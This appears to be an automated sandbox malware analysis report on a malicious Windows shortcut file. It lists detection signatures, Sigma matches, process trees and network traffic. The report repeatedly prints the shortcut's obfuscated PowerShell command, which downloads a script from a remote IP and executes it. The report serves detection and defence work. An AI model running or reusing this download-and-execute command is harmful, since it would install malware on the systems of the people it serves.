Edit tour

Windows Analysis Report
EzE0GqgjU0.lnk

Overview

General Information

Sample name:	EzE0GqgjU0.lnk renamed because original name is a hash value
Original sample name:	9c7e3396ea85258017f63420a73ff3bf8be2c108b09dbbeb26237bfa3c3f549e.lnk
Analysis ID:	1568476
MD5:	162434f6a1f739dc14ac5c644019b34f
SHA1:	0bd42f8aab9653eba62d40a5229f079f2fdbd741
SHA256:	9c7e3396ea85258017f63420a73ff3bf8be2c108b09dbbeb26237bfa3c3f549e
Tags:	104-37-175-232Compilazioneprotetticopyrightlnkuser-JAMESWT_MHT
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Windows shortcut file (LNK) starts blacklisted processes

AI detected suspicious sample

Connects to many ports of the same IP (likely port scanning)

Machine Learning detection for sample

PowerShell case anomaly found

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: PowerShell Download and Execution Cradles

Suspicious powershell command line found

Uses known network protocols on non-standard ports

Windows shortcut file (LNK) contains suspicious command line arguments

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: PowerShell Web Download

Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP

Sigma detected: Usage Of Web Request Commands And Cmdlets

Uses a known web browser user agent for HTTP communication

Classification

Process Tree

System is w10x64

cmd.exe (PID: 5576 cmdline: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt) MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2548 cmdline: pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt) MD5: 04029E121A0CFA5991749937DD22A1D9)

cleanup

Sigma Signatures

System Summary

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt), CommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt), CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt), ProcessId: 5576, ProcessName: cmd.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: PowerShell Download and Execution Cradles

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt), CommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt), CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt), ProcessId: 5576, ProcessName: cmd.exe

Sigma detected: PowerShell Web Download

Source: Process started

Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt), CommandLine: pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt), CommandLine|base64offset|contains: F,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5576, ParentProcessName: cmd.exe, ProcessCommandLine: pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt), ProcessId: 2548, ProcessName: powershell.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt), CommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt), CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt), ProcessId: 5576, ProcessName: cmd.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt), CommandLine: pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt), CommandLine|base64offset|contains: F,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5576, ParentProcessName: cmd.exe, ProcessCommandLine: pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt), ProcessId: 2548, ProcessName: powershell.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

• AV Detection
• Networking
• System Summary
• Data Obfuscation
• Persistence and Installation Behavior
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• Anti Debugging
• HIPS / PFW / Operating System Protection Evasion
• Language, Device and Operating System Detection

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://95.169.201.100:18960/uploads/team-1/readme.txt

Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: EzE0GqgjU0.lnk

ReversingLabs: Detection: 23%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.7% probability

Machine Learning detection for sample

Source: EzE0GqgjU0.lnk

Joe Sandbox ML: detected

Networking

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 95.169.201.100 ports 18960,0,1,6,8,9

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 18960
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 18960

Source: global traffic

TCP traffic: 192.168.2.6:49709 -> 95.169.201.100:18960

Source: Joe Sandbox View

IP Address: 95.169.201.100 95.169.201.100

Source: Joe Sandbox View

ASN Name: GOBULNETBG GOBULNETBG

Source: global traffic	HTTP traffic detected: GET /uploads/team-1/readme.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 95.169.201.100:18960Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uploads/team-1/readme.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 95.169.201.100:18960Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 95.169.201.100
Source: unknown	TCP traffic detected without corresponding DNS query: 95.169.201.100
Source: unknown	TCP traffic detected without corresponding DNS query: 95.169.201.100
Source: unknown	TCP traffic detected without corresponding DNS query: 95.169.201.100
Source: unknown	TCP traffic detected without corresponding DNS query: 95.169.201.100
Source: unknown	TCP traffic detected without corresponding DNS query: 95.169.201.100
Source: unknown	TCP traffic detected without corresponding DNS query: 95.169.201.100
Source: unknown	TCP traffic detected without corresponding DNS query: 95.169.201.100
Source: unknown	TCP traffic detected without corresponding DNS query: 95.169.201.100
Source: unknown	TCP traffic detected without corresponding DNS query: 95.169.201.100

Source: global traffic	HTTP traffic detected: GET /uploads/team-1/readme.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 95.169.201.100:18960Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uploads/team-1/readme.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 95.169.201.100:18960Connection: Keep-Alive

Source: EzE0GqgjU0.lnk

String found in binary or memory: http://95.169.201.100:18960/uploads/team-1/readme.txt)

System Summary

Windows shortcut file (LNK) contains suspicious command line arguments

Source: EzE0GqgjU0.lnk

LNK file: /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt)

Source: classification engine

Classification label: mal100.troj.winLNK@4/4@0/1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: NULL

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lrrfhykx.5ya.ps1

Jump to behavior

Source: C:\Windows\System32\conhost.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: EzE0GqgjU0.lnk

ReversingLabs: Detection: 23%

Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt)
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt)
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt)	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: EzE0GqgjU0.lnk

LNK file: ..\..\..\..\Windows\System32\cmd.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Data Obfuscation

PowerShell case anomaly found

Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt)
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt)
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt)	Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt)
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt)			Jump to behavior

Persistence and Installation Behavior

Windows shortcut file (LNK) starts blacklisted processes

Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 18960
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 18960

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3598			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6219			Jump to behavior

